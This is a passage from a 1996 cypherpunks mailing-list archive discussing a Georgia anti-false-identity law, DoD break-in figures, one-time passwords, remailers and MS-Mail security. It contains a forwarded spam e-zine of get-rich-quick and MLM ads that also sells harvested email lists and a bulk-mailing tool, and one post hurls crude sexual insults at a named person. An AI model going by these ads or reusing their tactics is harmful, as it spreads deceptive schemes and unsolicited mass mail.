JPr2WLKXjmYImH72X3CvNuEQY19fV1N/n0iVoKFY0xwz814dMf6MMM4Wt5D1gxfk
HjYvMFWuRVFMR5cN3DJIN/lAIV7zY4Pga77gVu3eo0Q3hN8SCP2ZIiMAStkA+6e/
v6FXGIeijUo=
=AbdV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 27 Jun 1996 21:50:02 +0800
To: cypherpunks@toad.com
Subject: Re: Bruce Taylor at HotWired
In-Reply-To: <199606270208.TAA29471@mh1.well.com>
Message-ID: <v03007600adf80d494b7d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM -0400 6/26/96, Jon Lebkowsky wrote:
> however in his place we've extended an
> 11th-hour invitation to Bruce Taylor of the National Law Center for Children
> and Families, and he's accepted.  Please join us!
> 
> (Requires that you join HotWired)

Ooooooo, I'm *excited*!

My very own chance to meet Bruce Taylor, AKA "Penis with a Blister", AKA "PWAB",  AKA "The Toolman", AKA "The Labia Nailer".

I soooo excited, I just want to reach down right now and fondle my inner child. 

Maybe not. After all that fondling, I'd probably be to TiReD...

Feh.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws', 
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nowhere@alpha.c2.org
Date: Fri, 28 Jun 1996 05:42:18 +0800
To: cypherpunks@toad.com
Subject: Ga Law/No False Identity
Message-ID: <199606271536.IAA07581@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Mailing from Electronic Frontiers Georgia 6/27/96:
----------snip----------
:Subject: [EFG] GA law criminalizing Spam cancels??
----------snip----------
:Electronic Frontiers Georgia has engaged the law firm of Bondurant, Mixson, 
:& Elmore (specifically Scott McClain) to look into a court challenge of 
:HB1630 "The Internet Police Law" which goes into effect on July 1st.  We see 
:this as an unecessary and badly framed law.
:
:This law would appear to make it a Georgia criminal act to remove spam & 
:spews from newsgroups.  This is law OCGA 16-9-93.1
:
:Some information can be found at
:
:    http://ninja.techwood.org/~efg/
:
:under the "Day the sites went out in Georgia" section.
:
:My understanding, and the perception of spammers seems to be that in order 
:to cancel a message, you must forge headers to become that person, thereby 
:falsely identifying yourself.  This seems to be in direct violation of the law
:
:  It shall be unlawful for any person, ... to transmit any data 
:  through a computer network ... if such data uses any individual 
:  name, ... to falsely identify the person, ... 
:
----------snip----------
:  -- Robert Costner
:     Electronic Frontiers Georgia
:     rcostner@intergate.net

Spamming aside, this strikes at my privacy and choice of anonymity. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 28 Jun 1996 08:38:46 +0800
To: m5@vail.tivoli.com>
Subject: Re: CIA Fears UmpTeen InfoNukes
Message-ID: <199606271845.LAA13527@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:57 AM 6/27/96 -0400, Vin McLellan wrote:
>...  The real threat is incompetent, poor-trained DoD
>system administrators -- and a class of computer-illiterate senior managers
>who define "system security" and routine administration as a marginal
>expenses and scorn readily available options like one-time passwords as too
>complex for the military mind.

Public key authentication could go a long way toward solving the military
and contractor's security problems.  However, they won't use public key
authentication for unclassified systems until it is available in "COTS"
(Commercial, Off The Shelf) software.  And it won't be available there
until it can be exported as well as sold domestically.  Catch-22


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Fri, 28 Jun 1996 07:16:37 +0800
To: "Josh Sled" <jsled@cory.EECS.Berkeley.EDU>
Subject: Re: info assembly line, "flits" (long)
In-Reply-To: <199606241741.KAA10522@cory.EECS.Berkeley.EDU>
Message-ID: <96Jun27.131433edt.20485@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <199606241741.KAA10522@cory.EECS.Berkeley.EDU>, "Josh Sled" <jsled@cory.EECS.Berkeley.EDU> writes:

    >> flit. I agree, a flit as a 0 or 1 is very unlikely in the near future.
    >> but at a document level, i.e. a document as a flit, we already have
    >> it in RCS systems that companies are struggling to implement well
    >> as we speak.

    > Again, I think a document system is the best suited for information
    > storage... the flit concept seems to be a great overkill.

Another basic problem that I'm surprised hasn't come up yet:

If I have a 1-bit flit with full revision history, don't I have to
have revision history on each of the bits of the revision history of
the original flit?  We're talking an infinite amount of storage space
here, for one flit that has been moved once!  Also, revisions for the
individual bits in program, including the programs to keep track of
flits, including revision history of programs in main memory, from
what it sounds like.

We will never have this much storage space.  An infinite amount is
required.  What would be the point anyways?  Makes a lot more sense on
a per-file basis.

-Robin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Fri, 28 Jun 1996 10:22:36 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Fears UmpTeen InfoNukes
Message-ID: <199606271857.NAA10915@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@vail.tivoli.com (Mike McNally) asks:

> ...  the article included a claim that there have been
>250,000 attempted break-ins on DoD computers over the past year.

>Does anybody know how they count that?

The number comes from the recent GAO report, which provides it as an
estimated upper bound of the number of attacks. Notice how rapidly the
press loses the distinction between an estimated upper bound and a
hard number. The GAO report claims that 559 attacks were reported on
DOD machines last year, and that "only 1 in about 150 incidents" are
reported. That comes out to less than 84,000, and I'm not sure where
the extra factor of 3 comes from. The GAO report is vage about the
distinction between "reported" and "successful" attacks in statistics
from different sources, and this may account for some of it.

The GAO report also gives statistics from recent penetration work
done by DISA. What they did was mount a bunch of attacks on DOD
systems and see what happened. They claimed a 65% success rate.  Only
4% of the successful attacks were detected, and only 27% of those
detected were reported back up the line to the Pentagon.

It's an interesting report. It's gao/aimd-96-84, and you can get it
via their website at (no kidding) http://www.gao.gov

Rick.
smith@sctc.com        secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 28 Jun 1996 08:48:32 +0800
To: cypherpunks@toad.com
Subject: my senate testimony
Message-ID: <199606271917.PAA00317@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I sent a copy of my senate testimony here last night, discovered
that a bunch of lines were truncated, and (I thought) immedately sent out
a revised, corrected version.  The garbled version got forwarded to
a bunch of mailing lists, however, and now I'm getting dozens of
messages from people telling me about the truncated lines.

The corrected version can be found at
	ftp://research.att.com/dist/mab/testimony.txt
Please forward this version (or the URL) to anyone to whom you forwarded
the the garbled version.  Thanks.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@gs160.sp.cs.cmu.edu
Date: Fri, 28 Jun 1996 09:54:04 +0800
To: cypherpunks@toad.com
Subject: Re: Grubor remailer? (Was Re: Lucifer remailer)
In-Reply-To: <+cmu.andrew.internet.cypherpunks+QloTyoO00UfAE10B1B@andrew.cmu.edu>
Message-ID: <199606272033.NAA17591@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Hm, is that Dr. John Grubor's domain (aga@dhp.com)?

DHP is "The DataHaven Project", a local (Pittsburgh) ISP "dedicated to
providing anonymous and/or private accounts for users."  The egregious
Law Doctor *could* be running the remailer, but there's no particular
reason to think so.

>That will make a nice anonymous remailer... NOT! Thank you.

It might make a nice test case for the Pennsylvania anti-remailer law.

--
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 29 Jun 1996 08:20:06 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Fears UmpTeen InfoNukes
Message-ID: <199606272352.QAA10348@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:38 PM 6/27/96 -0400, Vin McLellan wrote:
>        On Cypherpunks-L, Vin McLellan wrote:
>
>>>...  The real threat is incompetent, poor-trained DoD
>>>system administrators -- and a class of computer-illiterate senior managers
>>>who define "system security" and routine administration as a marginal
>>>expenses and scorn readily available options like one-time passwords as too
>>>complex for the military mind.
>
>        Bill Frantz <frantz@netcom.com> responded:
>
>>Public key authentication could go a long way toward solving the military
>>and contractor's security problems.  However, they won't use public key
>>authentication for unclassified systems until it is available in "COTS"
>>(Commercial, Off The Shelf) software.  And it won't be available there
>>until it can be exported as well as sold domestically.  Catch-22
>
>        I love PKC with all its promise, but you overstate (and IMHO,
>attribute inappropriately) the barriers that slow the adoption of one-time
>password authentication in the military... and many other more highly
>regarded IS environments.

On thinking about your rant, I think you have a valid point.  What our
venture capitalists said to us was, "There is no market for security."  Now
perhaps the ITAR helps suppress that market on the basis of, "If I'm going
to have to wander the information superhighway naked, why should I shut the
blinds on my house."  Given no market, and the requirement to support
everything you ever supported, it is hard to justify building in security
features.


>        No, in this case, the blame is spread far more widely.  Yes, DoD
>and other meta-institutions have been slow to acknowledge and act upon the
>obvious solution to their biggest and most obvious vulnerability.  [One 
>Time Passwords - WSF]  Security
>is still seen as a marginal item in the budget -- not something that must
>be designed into both the technology or implicit in its responsible
>management.

I have a client who provides services to part of the DOD.  (My contract
prevents me from being more specific.)  Their only saving grace is they
don't use the Internet or Unix.  (Making them vulnerable to a much smaller
group of hackers.)

The ideal situation for them would be to use public key authentication
because it would be entirely user-transparent.  Doing OTP's the way Apple
does them (see below) would also work well.  However, to implement one of
these systems requires modifying a bunch of terminal emulator programs from
different vendors (some of whom are no longer in business).  Without widely
adopted standards for OTP logon, these modifications are not likely to
happen.


>        But they've been able to get away with it because the hardware
>vendors and big software companies -- the very firms which now harp on ITAR
>denying them the international market -- have been so hesitant to risk
>their margins by designing security into their number crunchers...

I think that backward compatibility requirements are a significant part of
the reason we see this problem.  The other part is, of course, that there
is no market for security.

Apple has a form of one time passwords in their file sharing system.  When
you enter your password, it is used as a key to encrypt a challenge sent by
the file server (Using a symmetric cypher).  The result is returned,
decrypted and compared with the original challenge.  But this system didn't
have to be compatible with a hardware VT100 or TTY-33.


>        Somehow, firing, fining, demoting, or making liable for damages,
>any designated system administrator who can't find the time (within, say, a
>week) to apply vendor-circulated patches for vulnerabilities announced by
>CERT is too extreme a proposal...

The problem, in general, isn't the system administrators.  If management
gave the same priority to security that it does to joining new users or
installing new hardware, sysadmins would have the time to install the
patches.  Most sysadmins are up to their asses in alligators.  Security is
something to put off.  If the managers were judged on the security of their
systems (perhaps via independent audit), then they might give the problem
some priority.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Fri, 28 Jun 1996 09:50:10 +0800
To: cypherpunks@toad.com
Subject: Re: MS-Mail Security
Message-ID: <TCPSMTP.16.6.27.-15.0.46.2780269260.1184837@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


 -=> Quoting In:wywong2@cs.cuhk.hk to Harka <=-
 
 In> I would like to gather informations of whether the MS-Mail server
 In> is  secure or not, is anyone heard of somebody, say, disguise as other
 In> user  or read other user e-mail?


I'd also like to know how secure the MS-Mail files are (*.mmf). They are password protected and should be encrypted but does anybody know how secure?

Harka
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "`` Cyber - Times ``" <cyber02@sprynet.com>
Date: Sat, 29 Jun 1996 10:36:03 +0800
To: cyber01@sprynet.com
Subject: `` Cyber - Times ``
Message-ID: <199606272057.NAA27234@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


========> Maximize your window for best viewing <==============

======> WELCOME TO CYBER - TIMES WEEKLY E-ZINE <=========

=============> The BEST web site  of the week! <================
===============> CNN on the WWW! <======================

=========> Check Out Our Complete Marketing Package! <=========

* Please do not be offended by this E-ZINE if you choose not to be informed of
valuable information, simply reply and put UNSUBSCRIBE in the SUBJECT and you
will receive no further issues. We are the PREMIERE Mailing Service on the
Internet today, and we currently have a subscription list of over 2,000,000
people now! Remember, we're a FREE E-ZINE, so enjoy your issue. And if you wish
to stay SUBSCRIBED to CYBER-TIMES E-ZINE simply do nothing and your FREE WEEKLY
issue will keep coming! If you have any friends that would enjoy receiving a
copy feel free to have them send a message to: subscribe@cyber-times.com  then
they will be added on our list.

----- Thanks you for your support ---- 
       --- CYBER - TIMES ---

* To place your ad in the Internet's Best E-Zine, go to the end of this 
 E-ZINE. We are having a TREMENDOUS Weekly SPECIAL!!

=====> GRAND OPENING: CYBER-TIMES MALL ON JUNE 28th <======

* To REPLY to an ad simply E-mail the address listed in the ad or visit
there Web Site.

///////////////////////////////////////////////////////////////////////////

************** Government: Home-Business ************************

============== NO MLM or SELLING =====================

Earn $500 to $1,000 weekly. This is a GUARANTEED Home-Business 
that was setup and created by the U.S. Government. We will even give 
you the phone number to call and verify the program. For FREE complete 
information visit us on the WWW at:     
                   http://members.gnn.com/HUDTRACER/fha.htm
or E-Mail our auto-responder at:====>   hud@cyber-times.com    
and you'll get complete information in 20 seconds!!

////////////////////////////////////////////////////////////////////////////

Hiring Now! This truly is THE PERFECT JOB - working on your home PC.
You can now telecommute from home with our International Software 
Company Co. We are seeking full-time & part-time personnel. We offer
flexible hours. Must have a computer to process customers orders. Earn 
$25+ per hour. Must be a PRO and have a clear phone voice. E-mail 
experience helpful.  If you are enthusiastic and have a positive 
personality call Mrs. Roberts at InterNetWorks at: (619) 781-4104. 
Call NOW  ...24 hours a day! Working at home is the "Wave of the Future". 
Come Surf the Net with us and earn your financial reward.
or e-mail my autoresponder at: internetworks@cyber-times.com

//////////////////////////////////////////////////////////////////////////

Save 50% ON YOUR PHONE BILL with rates as low as 9.9 cents per minute 
flat rate day or night from Sprint, MCI, and WilTel.  Home or business, billed
in 6 increments. Not MLM.  No fees, minimums, or commitments for most plans. 
Also available: 800/888#'s, calling cards, International callback, T-1's, and
more.  For complete rates, visit our web site at:
http://www.catalog.com/impulse/tel.htm or Email:  ad18@cyber-times.com

////////////////////////////////////////////////////////////////////////////

HEALTHRIDER  Blowout Sale- $399.99! For a limited time, the premier total body
fitness machine that gently stretches and tones every major-muscle group in your
body at the same time is offering a "blowout special" on all remaining
demo-models for just $399.99.  That's a $100.00 savings off the original price,
so don't delay.  This rare HealthRider opportunity is for a limited time and is
good only while supplies last. Call us toll-free at (800) 529-2919 to get all
the details! Now's your chance to start looking and feeling your very best!  The
number to call is (800) 529-2919. (Restrictions may apply)

///////////////////////////////////////////////////////////////////////////

The Youngest MLM Co. ever Featured on the Cover of Success Mag.
Awarded 1995 Best Company in MLM, by MLM Insider Magazine
*Rated #1 by Market Wave/Profit Now, Jan. 1996
*World's most popular nutritionist, Dr. Earl Mindell
*World's most technologically advanced products
*PROVEN DOWLINE & SUPPORT SYSTEMS
Voice box 800-566-5319/800-663-0631 ref. #32025-9

///////////////////////////////////////////////////////////////////////////

MONEY MAKING OPPORTUNITIES FOR WOMEN Want extra money?
Want to be your own boss? Over **200** EXCITING and ENJOYABLE
ways to make fast and easy money.  Most require no training or 
investment.  Work Full Time! Work Part Time! All Legitimate.  Check out
my 20 Page BOOKLET for ONLY $5.00.  Send cash, check or money order
to A. Tucker   Box 371264    El Paso, Texas  79937.

//////////////////////////////////////////////////////////////////////////

WORK FROM HOME! NO INVESTMENT REQUIRED.  Experienced self-
motivated telemarketers wanted! Excellent income possibilities selling our
12.9 c/min. FLAT RATE long distance service & 17.9c/min travel card (NO 
SURCHARGES), with 6 second billing.  In test runs, telemarketers easily
signed 10 new customers a day.  One working full timer got 120 in 5 days.
Pay STARTS at $5/customer.  Earned raises and long-term residual income
in compensation plan.  208-263-5681 9am-8pm PDT.

///////////////////////////////////////////////////////////////////////////

                  SPORTS/ENTERTAINMENT
Sports News, Point Spreads and MUCH MUCH MORE!!
*ALSO Soap Opera Updates CALL NOW !!!
1-900-476-6368 EXT. 6761
$2.99 per minute
Must be 18 years to Call
Serv-U (619) 645-8434

///////////////////////////////////////////////////////////////////////////

THE PERFECT JOB FOR YOU!

Are you looking for legitimate work to do at home and make above average
income? WebWorks is seeking 100 agents to answer phones, return e-mail,
process orders and offer technical support for our Online Service.
For information email at: ad19@cyber-times.com or call Ms. Doughery
for an interview at (409) 756-5669 9-6 p.m. Central Time.

///////////////////////////////////////////////////////////////////////////

Do YOU need a BIG, permanent monthly income?? (up to $65,000/month?) Would
YOU like to be able to help more people- family, charities?  Have you been
disappointed in networking/mlm programs?  16,000+ joined in OUR downline in
April!! Some are already making $65,000/mo! Contact me BEFORE you join for
benefits available only to our downline.  Call NOW:  512-505-6838 (3-minute
recorded message) Get fax on demand:  703-736-1600, doc 839 (call from
fax-phone) E-mail: ad5@cyber-times.com      Fax: 360-423-2238         Do it Now!

////////////////////////////////////////////////////////////////////////////

INCREASE YOUR INCOME!
Get that promotion you deserve or find that dream job you've been looking
for. Learn the secrets of creating the ultimate  resume that hiring managers
choose most often.  These techniques have been tested and perfected over the
last 10 years.  For complete, easy, do-it-yourslef guide, including the "How to
Write the Perfect Bullet" section, send $14.95 to: M. Rogers, P.O. Box 583,
Hayward CA  94543-0583

////////////////////////////////////////////////////////////////////////////

                           THE PERFECT JOB FOR YOU !
The perfect job for those who wish to work at home on their own computers!!  S.
S. Publishing is seeking Customer Service Representatives to answer E-MAIL and
process INBOUND PHONE CALLS on your own telephone and computer.  Must be
positive, professional and have a pleasant phone voice and be familiar with
e-mail.  Experience preferred, but will train motivated, enthusiastic
individuals.  Full-time or Part-time positions available, you set the times that
work best for you.  Above average earnings!!  For more information call S.S.
publishing at 307-856-7090 or E-mail your daytime phone number to: 
ad20@cyber-times.com 

///////////////////////////////////////////////////////////////////////////

Love Making 2000 (M/F) A guide on creating intense emotions for increased and
intense sexual pleasure.  Discover feelings in your body that you never knew
existed before.  Highs you never thought were possible.  Send $14.95 to Simmons
Enterprises 1186-1124 Londsdale Ave. North Vancouver, B.C.  V7M 2H1. Canada *As
a BONUS a chapter called Designing the Lovers Playroom. *Receive $150.00 for
your fantasy details in the book.

//////////////////////////////////////////////////////////////////////////

"FAX MACHINES WORK!!!  Use your Fax machine responsibly.  Use it to make
money (even while you are sleeping).  I'll show you how.  I'll give you living
proof. Call me TOLL FREE with your name, FAX, and phone numbers at:
1-800-995-0796 ext. 2583

//////////////////////////////////////////////////////////////////////////

============ THE PERFECT BUSINESS!!! ==========
NO Sales! NO Monthly Purchases! NO Inventory! NO Recruiting! NO Phone 
Calls! NO Meetings! NO Overhead! One-time $120 to $750 outgo generates 
$HUNDREDS to $THOUSANDS per month income!
===========NOTHING ELSE REQUIRED!!==========
We will build YOUR business. You get paid for OUR work!! The best 
investment you will ever make is owning your own business. For More Info 
( 800 ) 955-3974 or e-mail:  ad10@cyber-times.com

//////////////////////////////////////////////////////////////////////////

WARNING!!! WHAT NO LONG DISTANCE CARRIER WANTS YOU TO KNOW!!!
LONG DISTANCE SERVICE FOR AS LITTLE AS 9.9 OR 10.9 CENTS PER MIN.
9.9 or 10.9 cents interstate ANYTIME, ANYWHERE in the continental USA.
13.9 800#'s 17.9 cpm calling card, 16.9 rechargeable Debit Cards, No sign on
fee, No monthly minimums, No volume requirements. One of the BIG THREE IS
UNDERLYING CARRIER. Cut your cost to minimum or participate in referral
commissions. Lifetime residual, churches, charities, non profit groups,
businesses or individuals. Don't pass this up--it costs nothing to check us out.
E-mail for details and more information:  ad13@cyber-times.com

///////////////////////////////////////////////////////////////////////////

Why Wait for ROMANCE...ADVENTURE?
Let our #1 Singles Dateline find Attractive, 
Available singles in your area for you.
Post/Listen to 100's of Personals.  Call now and Connect!
1-900-369-0419
ONLY $1.99/min  18+  Futurefone

////////////////////////////////////////////////////////////////////////////

                               PET PEOPLE
Do you own an exotic bird or know someone who does? (GREAT GIFT)
Lake Tahoes 1995 Entertainer of the year, Max Clever offers you this 
Tolly award winning Video. "Max Clevers" "BIRD TRAINING SECRETS"
In the 90 minutes you will learn everything you need to know about training your
bird I include TRICK TRAINING, potty training, taming, nutrition etc.. It's only
$34.95 + $4.95 S+H to: Bird Traing Secrets 230 Bridge St. Collegeville, PA 
19426 or 1-800-689-8707 all cards. Visit Website at:
http://www.acy.digex.net/~questflm/

//////////////////////////////////////////////////////////////////////////////

MINIATURE BASEBALL
*Sweeping the Country*
*Finally a Realistic 4 Player Per Team Baseball Game* 
*Complete Rules*
*Featuring the Auto-Ump, Utility Infielder, and Knockdown Rule*
*Complete Blueprints and Stadium Designs*
*Add on Products Available*
1-800-240-1263

//////////////////////////////////////////////////////////////////////////////

TRACE YOUR ROOTS
Some of the history goes back to the 1400's in Ireland.  Some of the USA 
discs cover as far back as 1725.  Coming soon, the history of 
African-American's in the USA.  Prices vary.  Available is the search of a
single family history for $39.95.  **Not every single person that was born or
died in an area is on the discs. **   E-mail:  ad21@cyber-times.com Leave postal
address for a complete list.

//////////////////////////////////////////////////////////////////////////////

You've seen the rest, now try the best? Sounds familiar? I've been there too,
and this is the company I joined! Believe me, if I can do it, so can you.  I'll
show you and lead every step of the way to a healthier, wealthier lifestyle
that's also a lot of fun! Now opening in Europe.  For free info without
obligation, Simply E-mail:  ad22@cyber-times.com 

//////////////////////////////////////////////////////////////////////////////

New Industry is Born! MARKET NETWORKING!
Become a Leader in the Industry 
Build a solid Business via- Sharing - Helping- Teaching
Simply, We have the System that Works!
Income Potential is very Lucrative
All we Need is "U" to spell SUCCESS
Please call: Louie at 503-644-7714 or Fax to 503-671-9964
Norma Jean at 503-644-3634

//////////////////////////////////////////////////////////////////////////////

Large Corporation hiring Customer Service Reps to work from home taking 
orders for memberships to on-line service.  All calls inbound.  No selling. 
Earn $25+ per hour.  Must have professional phone voice, and home computer for
order entry.  Email experience helpful.  Only persons with those qualifications
should CALL Mr. Bellet 1-804-643-3229 24 hours a day or EMAIL
gatesnet@cyber-times.com

//////////////////////////////////////////////////////////////////////////////

STAR LINK- GREAT SOFTWARE PRICES for PC's & MACS.  We carry 1000's 
of software titles at low, low prices. Special discounts available for Students,
Faculties, and Schools.  PO's are welcome from Government Agencies, Educational
Institutions, & Corporate 1000.  Phone, Fax or Email for current prices, or to
request a price list.   Ph: (215) 953-8239     Fax: (215)953-8249    Email:
ad23@cyber-times.com 

//////////////////////////////////////////////////////////////////////////////


==========>    TOP WEB SITE OF THE WEEK    <================

=========>  This is a MUST visit Web Site:  <===================
===============>  http://www.cnn.com  <=====================

CNN Online is the best place to get up to the minute information around
the clock. Business, Sports, Technology Reports, Health etc.


======================================================

          Here's The Unbelievable Prices To Advertise Here.

1) 7 line classified ad to 500,000 people==> $49 =>Extra Lines => $2.00 
2) 7 line classified ad to 1,000,000 people=>$99 =>Extra Lines => $4.00 
3) 7 line classified ad to 1,500,000 people=>$149=>Extra Lines => $6.00 
4) 7 line classified ad to 2,000,000 people=>$185 =>Extra Lines  => $8.00 


**** PLACE YOUR ORDER TODAY! THESE PRICES WON'T LAST LONG ****


****For anyone who advertises with CYBER-TIMES will receive 900 Places
to Advertise for FREE on the World Wide Web and a FREE AD in 
CYBER-TIMES Electronic Mall for 1 year! We are here to see you achieve.

****Also, as you noticed in the ads above your mail is forwarded to you 
through our server!! So your E-mail address is not given out.

===========================================================

                   ********** Complete Marketing Package **********

 We have put together the most complete marketing package and are glad to
make it available to you. Here's what we put together:

=====> 2 Million E-mail Addresses
=====>FREE copy of Pegasus Mail
=====>900 Places to advertise FREE
=====>Complete Internet Business Guide
=====>FREE Auto-Responer for 1 FULL YEAR.=====>FREE 1 YEAR ad in our New Cyber
Mall

*If this is any interest to you please send a E-mail message to our
Auto-Responder at:  marketing@cyber-times.com   And you will receive FREE
complete information.

============================================================

** We also build TARGETED E-MAIL LISTS for your special needs call 
   216-226-8799 For our SPECIAL PRICES!! So if you're selling something 
   SPECIAL and you need a BRAND NEW FRESH TARGETED LIST, 
   you're at the right place. And we'll even do the mailing of the list 
   FOR YOU!!

============================================================

Here's a few of many testimonials we like to share with you.
--------------------------------------------------------------------
" Your company is doing a terrific job for me! Thank you, Thank you! 
I am very impressed with your computer and marketing expertise. I will 
continue to send business your way. You deserve to get wealthy from 
this because you're doing a good job for people. You really give them 
their money's worth and do not cheat them like so many of these other 
e-mailing companies do. I have run ads with 3 others companies and 
NEVER got orders, like I do with you". 

Thanks.      - Becky -     ( California )


"I have placed ads with various companies such as "Cyber-Promotions",
"South West" and  "Pin-Point" you guys are by far the BEST. I have never
gotten a better response and made more sales. I look forward to placing my
ad again and again... 

Thank you.  -Dennis-     ( Illinois )

=========================================================

============  " FLOODGATE " The Bulk E-Mail Loader.  ===========

If you ever heard of it now is your chance to get it. Learn step by step on how
to extract E-mail addresses and send your sales letter out to over 500,000
people per day! You may have heard of similar programs like FREEDOM or HARVEST
but don't be fooled by them this is the REAL THING! For FREE complete
information simply send an E-mail message to our Auto-Responder at: 
flood@cyber-times.com Also, 2 MILLION E-mail addresses are included with your
copy.

=========================================================

-----------------------------ORDER-FORM----------------------------------

 Yes, I want to place an advertisement in your Electronic-Magazine to 
the following amount of people.  Check one Below:

$39 - 500,000:_____  $59 - 1,000,000:_____ 

$79 - 1,500,000:____ $99 - 2,000,000:____      

These prices above are 50% off the regular costs. This special won't 
last to long, get your spot now!! Ads are placed in order as they're
received. 

There are never more than 26 advertisements in each E-ZINE!

All advertisements can only be 70 characters per line and font size of 12.
When sending payment include a copy of your ad, EXACTLY how you want
it sent, and it will be sent that way.

Including Extra Lines Total:_________________

-------------------------------------------------------------------------------

First & Last Name:__________________________________

Mailing Address:____________________________________

City:_____________________________

State:____________________________

Zipcode:_________________

E-Mail Address:____________________________________

Phone Number:_____________________________________

Make check or money order payable to: Creative Financial Alternatives

Send Payment to: 

Creative Financial Alternatives
CYBER-TIMES
14837 Detroit Ave. 
Suite 135
Lakewood, OH 44107

* If you have any questions or want to place an ad call: 216-226-8799
   Thank you.

* We also accept checks by Phone or Fax. You can place you order by 
  phone, or tape your check to a piece of paper with all your ordering 
  information and a copy of the ad exactly as you would like to place it
  and fax it to 216-226-3225. 

Phone: 216-226-8799

Fax: 216-226-3225

<< Copyright 1996 - All Rights Reserved >>

 Cyber-Times, or any subsidiary thereof, accept no responsibility
 whatsoever for the content or legality of any advertisement that appears in any
 mailing.  It is the advertisers responsibility to check with Local, State, and
 Federal laws pertaining to the product or service they advertise. 
                                Cyber-Times
                       14837 Detroit Ave. Suite 135
  `\|||/                    Lakewood, Ohio 44107
   (o o)       Phone: 216-226-8799     Fax: 216-226-3225
ooO_(_)_Ooo________________________________________________
_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|
_____|__ __|_____|_____|_____|_____|_____|_____|_____|_____|
_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Fri, 28 Jun 1996 10:08:44 +0800
To: cypherpunks@toad.com
Subject: Re: Grubor remailer? (Was Re: Lucifer remailer)
Message-ID: <199606272114.RAA04139@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain



> dhp is not "Grubor's domain," it's just a Pittsburgh ISP
> with liberal terms of service (which is why it can run
> remailers).    Perhaps you're thinking of "manus.org"?
> 

I thought that DHP is mostly Canadian.  I know that Panzer deals w/ 
them & he is running from Pitt. but I think that the others are 
mostly from Canada.  I work w/ a few of them, but they are not here 
to ask about this (at the moment.  They just went out for dinner).  I 
don't think that DHP (Data Haven Project) is really an ISP per se...
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinnie moscaritolo <vinnie@webstuff.apple.com>
Date: Sat, 29 Jun 1996 08:46:34 +0800
To: cypherpunks@toad.com
Subject: crypto and bagpipes [NOISE]
Message-ID: <v0300740dadf8d550a116@[17.203.21.75]>
MIME-Version: 1.0
Content-Type: text/plain


>>>A Missive From: David Kovar (kovar@nda.com)
>>>
>>>What is the connection between crypto and bagpipes? Well
>>>crypto is regarded as an armament by the US ITAR regulations.
>>>Later this month a British court is to rule as to whether
>>>bagpipes are still classified as "instruments of war"!
>>>The story is in today's Times newspaper (The British one)
>>>It seems that a piper is being taken to court for practising
>>>on Hampstead Heath, which has a bye-law forbidding music.
>>>Mr Brooks, the piper, has denied the charge, citing a case in 1746,
>>>where bagpipes were declared to be instruments of war, not musical
>>>instruments, and a subsequent Act of Parliament which specifically
>>>stated that they were weapons. He claims he wasn't playing a musical
>>>instrument, but practising with a weapon!
>>>
>>>The imagination boggles if his claim is successful! Will it
>>>be possible to sue pipers for assault with a deadly weapon?
>>>Will airports be equipped with bagpipe detectors?
>>>
>>>David Wadsworth                |  Wohin der Weg? Kein Weg!
>>>dwadsw@etna.demon.co.uk        |  Ins Unbetretene. (Faust)



Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Fri, 28 Jun 1996 10:20:32 +0800
